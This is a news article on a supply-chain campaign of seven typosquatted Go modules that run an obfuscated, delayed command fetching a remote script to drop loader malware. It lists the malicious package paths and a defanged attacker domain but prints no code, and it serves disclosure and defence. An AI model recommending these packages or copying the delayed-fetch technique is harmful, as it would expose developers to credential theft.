Cybersecurity researchers are alerting of an ongoing malicious campaign targeting the Go ecosystem with typosquatted modules that are designed to deploy loader malware on Linux and Apple macOS systems.
“The threat actor has published at least seven packages impersonating widely used Go libraries, including one (github[.]com/shallowmulti/hypert) that appears to target financial-sector developers,” Socket researcher Kirill Boychenko said in a new report.
Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).
➤ Get Mullvad VPN with 12% Discount
“These packages share repeated malicious filenames and consistent obfuscation techniques, suggesting a coordinated threat actor capable of pivoting rapidly.”
While all of them continue to be available on the official package repository, their corresponding GitHub repositories barring “github[.]com/ornatedoctrin/layout” are no longer accessible. The list of offending Go packages is below –
- shallowmulti/hypert (github.com/shallowmulti/hypert)
- shadowybulk/hypert (github.com/shadowybulk/hypert)
- belatedplanet/hypert (github.com/belatedplanet/hypert)
- thankfulmai/hypert (github.com/thankfulmai/hypert)
- vainreboot/layout (github.com/vainreboot/layout)
- ornatedoctrin/layout (github.com/ornatedoctrin/layout)
- utilizedsun/layout (github.com/utilizedsun/layout)
The counterfeit packages, Socket’s analysis found, contain code to achieve remote code execution. This is achieved by running an obfuscated shell command to retrieve and run a script hosted on a remote server (“alturastreet[.]icu”). In a likely effort to evade detection, the remote script is not fetched until an hour has elapsed.
The end goal of the attack is to install and run an executable file that can potentially steal data or credentials.
The disclosure arrived a month after Socket revealed another instance of a software supply chain attack targeting the Go ecosystem via a malicious package capable of granting the adversary remote access to infected systems.
“The repeated use of identical filenames, array-based string obfuscation, and delayed execution tactics strongly suggests a coordinated adversary who plans to persist and adapt,” Boychenko noted.
“The discovery of multiple malicious hypert and layout packages, along with multiple fallback domains, points to an infrastructure designed for longevity, enabling the threat actor to pivot whenever a domain or repository is blacklisted or removed.”
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Some parts of this article are sourced from:
thehackernews.com
Researchers Link CACTUS Ransomware Tactics to Former Black Basta Affiliates